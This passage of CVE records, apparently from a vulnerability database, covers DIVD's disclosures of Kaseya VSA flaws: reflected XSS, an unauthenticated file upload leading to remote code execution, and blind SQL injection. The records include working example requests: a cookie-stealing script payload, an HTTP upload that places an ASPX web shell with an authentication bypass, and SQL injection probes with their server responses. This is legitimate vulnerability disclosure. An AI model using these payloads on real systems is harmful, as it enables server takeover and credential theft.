"discovery": "INTERNAL"
},
"title": "Authenticated Authenticated reflective XSS in Kaseya VSA \u003c= v9.5.6",
"x_generator": {
"engine": "Vulnogram 0.0.9"
},
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2021-30119",
"STATE": "PUBLIC",
"TITLE": "Authenticated Authenticated reflective XSS in Kaseya VSA \u003c= v9.5.6"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"credit": [
{
"lang": "eng",
"value": "Discovered by Wietse Boonstra of DIVD"
},
{
"lang": "eng",
"value": "Additional research by Frank Breedijk and Hidde Smit of DIVD"
}
],
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Authenticated reflective XSS in HelpDeskTab/rcResults.asp The parameter result of /HelpDeskTab/rcResults.asp is insecurely returned in the requested web page and can be used to perform a Cross Site Scripting attack Example request: `https://x.x.x.x/HelpDeskTab/rcResults.asp?result=\u003cscript\u003ealert(document.cookie)\u003c/script\u003e` The same is true for the parameter FileName of /done.asp Eaxmple request: `https://x.x.x.x/done.asp?FileName=\";\u003c/script\u003e\u003cscript\u003ealert(1);a=\"\u0026PathData=\u0026originalName=shell.aspx\u0026FileSize=4388\u0026TimeElapsed=00:00:00.078`"
}
]
},
"generator": {
"engine": "Vulnogram 0.0.9"
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/",
"refsource": "CONFIRM",
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
},
{
"name": "https://csirt.divd.nl/DIVD-2021-00011",
"refsource": "CONFIRM",
"url": "https://csirt.divd.nl/DIVD-2021-00011"
},
{
"name": "https://csirt.divd.nl/CVE-2021-30119",
"refsource": "CONFIRM",
"url": "https://csirt.divd.nl/CVE-2021-30119"
}
]
},
"solution": [
{
"lang": "en",
"value": "Upgrade to a version above 9.5.6"
}
],
"source": {
"advisory": "DIVD-2021-00011",
"discovery": "INTERNAL"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2021-30119",
"datePublished": "2021-07-09T13:20:58",
"dateReserved": "2021-04-02T00:00:00",
"dateUpdated": "2024-08-03T22:24:59.199Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-30118 (GCVE-0-2021-30118)
Vulnerability from cvelistv5 – Published: 2021-07-09 13:19 – Updated: 2024-08-03 22:24
VLAI?
Summary
An attacker can upload files with the privilege of the Web Server process for Kaseya VSA Unified Remote Monitoring & Management (RMM) 9.5.4.2149 and subsequently use these files to execute asp commands The api /SystemTab/uploader.aspx is vulnerable to an unauthenticated arbitrary file upload leading to RCE. An attacker can upload files with the privilege of the Web Server process and subsequently use these files to execute asp commands. Detailed description --- Given the following request: ``` POST /SystemTab/uploader.aspx?Filename=shellz.aspx&PathData=C%3A%5CKaseya%5CWebPages%5C&__RequestValidationToken=ac1906a5-d511-47e3-8500-47cc4b0ec219&qqfile=shellz.aspx HTTP/1.1 Host: 192.168.1.194 Cookie: sessionId=92812726; %5F%5FRequestValidationToken=ac1906a5%2Dd511%2D47e3%2D8500%2D47cc4b0ec219 Content-Length: 12 <%@ Page Language="C#" Debug="true" validateRequest="false" %> <%@ Import namespace="System.Web.UI.WebControls" %> <%@ Import namespace="System.Diagnostics" %> <%@ Import namespace="System.IO" %> <%@ Import namespace="System" %> <%@ Import namespace="System.Data" %> <%@ Import namespace="System.Data.SqlClient" %> <%@ Import namespace="System.Security.AccessControl" %> <%@ Import namespace="System.Security.Principal" %> <%@ Import namespace="System.Collections.Generic" %> <%@ Import namespace="System.Collections" %> <script runat="server"> private const string password = "pass"; // The password ( pass ) private const string style = "dark"; // The style ( light / dark ) protected void Page_Load(object sender, EventArgs e) { //this.Remote(password); this.Login(password); this.Style(); this.ServerInfo(); <snip> ``` The attacker can control the name of the file written via the qqfile parameter and the location of the file written via the PathData parameter. Even though the call requires that a sessionId cookie is passed we have determined that the sessionId is not actually validated and any numeric value is accepted as valid. Security issues discovered --- * a sessionId cookie is required by /SystemTab/uploader.aspx, but is not actually validated, allowing an attacker to bypass authentication * /SystemTab/uploader.aspx allows an attacker to create a file with arbitrary content in any place the webserver has write access * The web server process has write access to the webroot where the attacker can execute it by requesting the URL of the newly created file. Impact --- This arbitrary file upload allows an attacker to place files of his own choosing on any location on the hard drive of the server the webserver process has access to, including (but not limited to) the webroot. If the attacker uploads files with code to the webroot (e.g. aspx code) he can then execute this code in the context of the webserver to breach either the integrity, confidentiality, or availability of the system or to steal credentials of other users. In other words, this can lead to a full system compromise.
Severity ?
9.8 (Critical)
CWE
- n/a
Assigner
References
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
Credits
Discovered by Wietse Boonstra of DIVD
Additional research by Frank Breedijk of DIVD
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T22:24:59.357Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://csirt.divd.nl/CVE-2021-30118"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://csirt.divd.nl/DIVD-2021-00011"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019054377-9-5-5-Feature-Release-10-April-2021"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "Discovered by Wietse Boonstra of DIVD"
},
{
"lang": "en",
"value": "Additional research by Frank Breedijk of DIVD"
}
],
"descriptions": [
{
"lang": "en",
"value": "An attacker can upload files with the privilege of the Web Server process for Kaseya VSA Unified Remote Monitoring \u0026 Management (RMM) 9.5.4.2149 and subsequently use these files to execute asp commands The api /SystemTab/uploader.aspx is vulnerable to an unauthenticated arbitrary file upload leading to RCE. An attacker can upload files with the privilege of the Web Server process and subsequently use these files to execute asp commands. Detailed description --- Given the following request: ``` POST /SystemTab/uploader.aspx?Filename=shellz.aspx\u0026PathData=C%3A%5CKaseya%5CWebPages%5C\u0026__RequestValidationToken=ac1906a5-d511-47e3-8500-47cc4b0ec219\u0026qqfile=shellz.aspx HTTP/1.1 Host: 192.168.1.194 Cookie: sessionId=92812726; %5F%5FRequestValidationToken=ac1906a5%2Dd511%2D47e3%2D8500%2D47cc4b0ec219 Content-Length: 12 \u003c%@ Page Language=\"C#\" Debug=\"true\" validateRequest=\"false\" %\u003e \u003c%@ Import namespace=\"System.Web.UI.WebControls\" %\u003e \u003c%@ Import namespace=\"System.Diagnostics\" %\u003e \u003c%@ Import namespace=\"System.IO\" %\u003e \u003c%@ Import namespace=\"System\" %\u003e \u003c%@ Import namespace=\"System.Data\" %\u003e \u003c%@ Import namespace=\"System.Data.SqlClient\" %\u003e \u003c%@ Import namespace=\"System.Security.AccessControl\" %\u003e \u003c%@ Import namespace=\"System.Security.Principal\" %\u003e \u003c%@ Import namespace=\"System.Collections.Generic\" %\u003e \u003c%@ Import namespace=\"System.Collections\" %\u003e \u003cscript runat=\"server\"\u003e private const string password = \"pass\"; // The password ( pass ) private const string style = \"dark\"; // The style ( light / dark ) protected void Page_Load(object sender, EventArgs e) { //this.Remote(password); this.Login(password); this.Style(); this.ServerInfo(); \u003csnip\u003e ``` The attacker can control the name of the file written via the qqfile parameter and the location of the file written via the PathData parameter. Even though the call requires that a sessionId cookie is passed we have determined that the sessionId is not actually validated and any numeric value is accepted as valid. Security issues discovered --- * a sessionId cookie is required by /SystemTab/uploader.aspx, but is not actually validated, allowing an attacker to bypass authentication * /SystemTab/uploader.aspx allows an attacker to create a file with arbitrary content in any place the webserver has write access * The web server process has write access to the webroot where the attacker can execute it by requesting the URL of the newly created file. Impact --- This arbitrary file upload allows an attacker to place files of his own choosing on any location on the hard drive of the server the webserver process has access to, including (but not limited to) the webroot. If the attacker uploads files with code to the webroot (e.g. aspx code) he can then execute this code in the context of the webserver to breach either the integrity, confidentiality, or availability of the system or to steal credentials of other users. In other words, this can lead to a full system compromise."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-04-04T06:25:16",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://csirt.divd.nl/CVE-2021-30118"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://csirt.divd.nl/DIVD-2021-00011"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019054377-9-5-5-Feature-Release-10-April-2021"
}
],
"solutions": [
{
"lang": "en",
"value": "SaaS version has been fixed by the vendor.\nUpgrade on-premise to version 9.5.6 or above"
}
],
"source": {
"advisory": "DIVD-2021-00011",
"discovery": "INTERNAL"
},
"title": "Unauthenticated Remote Code Execution in Kaseya VSA \u003c v9.5.5",
"x_generator": {
"engine": "Vulnogram 0.0.9"
},
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2021-30118",
"STATE": "PUBLIC",
"TITLE": "Unauthenticated Remote Code Execution in Kaseya VSA \u003c v9.5.5"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"credit": [
{
"lang": "eng",
"value": "Discovered by Wietse Boonstra of DIVD"
},
{
"lang": "eng",
"value": "Additional research by Frank Breedijk of DIVD"
}
],
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "An attacker can upload files with the privilege of the Web Server process for Kaseya VSA Unified Remote Monitoring \u0026 Management (RMM) 9.5.4.2149 and subsequently use these files to execute asp commands The api /SystemTab/uploader.aspx is vulnerable to an unauthenticated arbitrary file upload leading to RCE. An attacker can upload files with the privilege of the Web Server process and subsequently use these files to execute asp commands. Detailed description --- Given the following request: ``` POST /SystemTab/uploader.aspx?Filename=shellz.aspx\u0026PathData=C%3A%5CKaseya%5CWebPages%5C\u0026__RequestValidationToken=ac1906a5-d511-47e3-8500-47cc4b0ec219\u0026qqfile=shellz.aspx HTTP/1.1 Host: 192.168.1.194 Cookie: sessionId=92812726; %5F%5FRequestValidationToken=ac1906a5%2Dd511%2D47e3%2D8500%2D47cc4b0ec219 Content-Length: 12 \u003c%@ Page Language=\"C#\" Debug=\"true\" validateRequest=\"false\" %\u003e \u003c%@ Import namespace=\"System.Web.UI.WebControls\" %\u003e \u003c%@ Import namespace=\"System.Diagnostics\" %\u003e \u003c%@ Import namespace=\"System.IO\" %\u003e \u003c%@ Import namespace=\"System\" %\u003e \u003c%@ Import namespace=\"System.Data\" %\u003e \u003c%@ Import namespace=\"System.Data.SqlClient\" %\u003e \u003c%@ Import namespace=\"System.Security.AccessControl\" %\u003e \u003c%@ Import namespace=\"System.Security.Principal\" %\u003e \u003c%@ Import namespace=\"System.Collections.Generic\" %\u003e \u003c%@ Import namespace=\"System.Collections\" %\u003e \u003cscript runat=\"server\"\u003e private const string password = \"pass\"; // The password ( pass ) private const string style = \"dark\"; // The style ( light / dark ) protected void Page_Load(object sender, EventArgs e) { //this.Remote(password); this.Login(password); this.Style(); this.ServerInfo(); \u003csnip\u003e ``` The attacker can control the name of the file written via the qqfile parameter and the location of the file written via the PathData parameter. Even though the call requires that a sessionId cookie is passed we have determined that the sessionId is not actually validated and any numeric value is accepted as valid. Security issues discovered --- * a sessionId cookie is required by /SystemTab/uploader.aspx, but is not actually validated, allowing an attacker to bypass authentication * /SystemTab/uploader.aspx allows an attacker to create a file with arbitrary content in any place the webserver has write access * The web server process has write access to the webroot where the attacker can execute it by requesting the URL of the newly created file. Impact --- This arbitrary file upload allows an attacker to place files of his own choosing on any location on the hard drive of the server the webserver process has access to, including (but not limited to) the webroot. If the attacker uploads files with code to the webroot (e.g. aspx code) he can then execute this code in the context of the webserver to breach either the integrity, confidentiality, or availability of the system or to steal credentials of other users. In other words, this can lead to a full system compromise."
}
]
},
"generator": {
"engine": "Vulnogram 0.0.9"
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/",
"refsource": "CONFIRM",
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
},
{
"name": "https://csirt.divd.nl/CVE-2021-30118",
"refsource": "CONFIRM",
"url": "https://csirt.divd.nl/CVE-2021-30118"
},
{
"name": "https://csirt.divd.nl/DIVD-2021-00011",
"refsource": "CONFIRM",
"url": "https://csirt.divd.nl/DIVD-2021-00011"
},
{
"name": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019054377-9-5-5-Feature-Release-10-April-2021",
"refsource": "CONFIRM",
"url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019054377-9-5-5-Feature-Release-10-April-2021"
}
]
},
"solution": [
{
"lang": "en",
"value": "SaaS version has been fixed by the vendor.\nUpgrade on-premise to version 9.5.6 or above"
}
],
"source": {
"advisory": "DIVD-2021-00011",
"discovery": "INTERNAL"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2021-30118",
"datePublished": "2021-07-09T13:19:42",
"dateReserved": "2021-04-02T00:00:00",
"dateUpdated": "2024-08-03T22:24:59.357Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-30117 (GCVE-0-2021-30117)
Vulnerability from cvelistv5 – Published: 2021-07-09 13:18 – Updated: 2024-08-03 22:24
VLAI?
Summary
The API call /InstallTab/exportFldr.asp is vulnerable to a semi-authenticated boolean-based blind SQL injection in the parameter fldrId. Detailed description --- Given the following request: ``` GET /InstallTab/exportFldr.asp?fldrId=1’ HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519; ``` Where the sessionId cookie value has been obtained via CVE-2021-30116. The result should be a failure. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 19:12:11 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 881 <!DOCTYPE html> <HTML> <HEAD> <title>Whoops.</title> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <link id="favIcon" rel="shortcut icon" href="/themes/default/images/favicon.ico?307447361"></link> ----SNIP---- ``` However when fldrId is set to ‘(SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END))’ the request is allowed. Request: ``` GET /InstallTab/exportFldr.asp?fldrId=%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%20%28SELECT%201%20UNION%20SELECT%202%29%20END%29%29 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519; ``` Response: ``` HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 17:33:53 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 7960 <html> <head> <title>Export Folder</title> <style> ------ SNIP ----- ```
Severity ?
9.8 (Critical)
CWE
- n/a
Assigner
References
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
Credits
Discovered by Wietse Boonstra of DIVD
Additional research by Frank Breedijk of DIVD
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T22:24:59.631Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "Discovered by Wietse Boonstra of DIVD"
},
{
"lang": "en",
"value": "Additional research by Frank Breedijk of DIVD"
}
],
"descriptions": [
{
"lang": "en",
"value": "The API call /InstallTab/exportFldr.asp is vulnerable to a semi-authenticated boolean-based blind SQL injection in the parameter fldrId. Detailed description --- Given the following request: ``` GET /InstallTab/exportFldr.asp?fldrId=1\u2019 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3\u0026roleId=2; webWindowId=59091519; ``` Where the sessionId cookie value has been obtained via CVE-2021-30116. The result should be a failure. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 19:12:11 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 881 \u003c!DOCTYPE html\u003e \u003cHTML\u003e \u003cHEAD\u003e \u003ctitle\u003eWhoops.\u003c/title\u003e \u003cmeta http-equiv=\"X-UA-Compatible\" content=\"IE=Edge\" /\u003e \u003clink id=\"favIcon\" rel=\"shortcut icon\" href=\"/themes/default/images/favicon.ico?307447361\"\u003e\u003c/link\u003e ----SNIP---- ``` However when fldrId is set to \u2018(SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END))\u2019 the request is allowed. Request: ``` GET /InstallTab/exportFldr.asp?fldrId=%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%20%28SELECT%201%20UNION%20SELECT%202%29%20END%29%29 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3\u0026roleId=2; webWindowId=59091519; ``` Response: ``` HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 17:33:53 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 7960 \u003chtml\u003e \u003chead\u003e \u003ctitle\u003eExport Folder\u003c/title\u003e \u003cstyle\u003e ------ SNIP ----- ```"
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-04-04T06:25:15",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021"
}
],
"solutions": [
{
"lang": "en",
"value": "SaaS version has been fixed by the vendor\n\nOnpremise\nUpgrade the server to version 9.5.6 or above\nUpgrade the agent to version 9.5.0.23 or above"
}
],
"source": {
"advisory": "DIVD-2021-00011",
"discovery": "INTERNAL"
},
"title": "Authenticated SQL injection in Kaseya VSA \u003c v9.5.6",
"x_generator": {
"engine": "Vulnogram 0.0.9"
},
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2021-30117",
"STATE": "PUBLIC",
"TITLE": "Authenticated SQL injection in Kaseya VSA \u003c v9.5.6"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"credit": [
{
"lang": "eng",
"value": "Discovered by Wietse Boonstra of DIVD"
},
{
"lang": "eng",
"value": "Additional research by Frank Breedijk of DIVD"
}
],
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The API call /InstallTab/exportFldr.asp is vulnerable to a semi-authenticated boolean-based blind SQL injection in the parameter fldrId. Detailed description --- Given the following request: ``` GET /InstallTab/exportFldr.asp?fldrId=1\u2019 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3\u0026roleId=2; webWindowId=59091519; ``` Where the sessionId cookie value has been obtained via CVE-2021-30116. The result should be a failure. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 19:12:11 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 881 \u003c!DOCTYPE html\u003e \u003cHTML\u003e \u003cHEAD\u003e \u003ctitle\u003eWhoops.\u003c/title\u003e \u003cmeta http-equiv=\"X-UA-Compatible\" content=\"IE=Edge\" /\u003e \u003clink id=\"favIcon\" rel=\"shortcut icon\" href=\"/themes/default/images/favicon.ico?307447361\"\u003e\u003c/link\u003e ----SNIP---- ``` However when fldrId is set to \u2018(SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END))\u2019 the request is allowed. Request: ``` GET /InstallTab/exportFldr.asp?fldrId=%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%20%28SELECT%201%20UNION%20SELECT%202%29%20END%29%29 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3\u0026roleId=2; webWindowId=59091519; ``` Response: ``` HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 17:33:53 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 7960 \u003chtml\u003e \u003chead\u003e \u003ctitle\u003eExport Folder\u003c/title\u003e \u003cstyle\u003e ------ SNIP ----- ```"
}
]
},
"generator": {
"engine": "Vulnogram 0.0.9"
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/",
"refsource": "MISC",
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
},
{
"name": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021",
"refsource": "CONFIRM",
"url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021"
}
]
},
"solution": [
{
"lang": "en",
"value": "SaaS version has been fixed by the vendor\n\nOnpremise\nUpgrade the server to version 9.5.6 or above\nUpgrade the agent to version 9.5.0.23 or above"
}
],
"source": {
"advisory": "DIVD-2021-00011",
"discovery": "INTERNAL"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2021-30117",
"datePublished": "2021-07-09T13:18:21",
"dateReserved": "2021-04-02T00:00:00",
"dateUpdated": "2024-08-03T22:24:59.631Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2019-14510 (GCVE-0-2019-14510)
Vulnerability from cvelistv5 – Published: 2019-10-11 11:44 – Updated: 2024-08-05 00:19
VLAI?
Summary
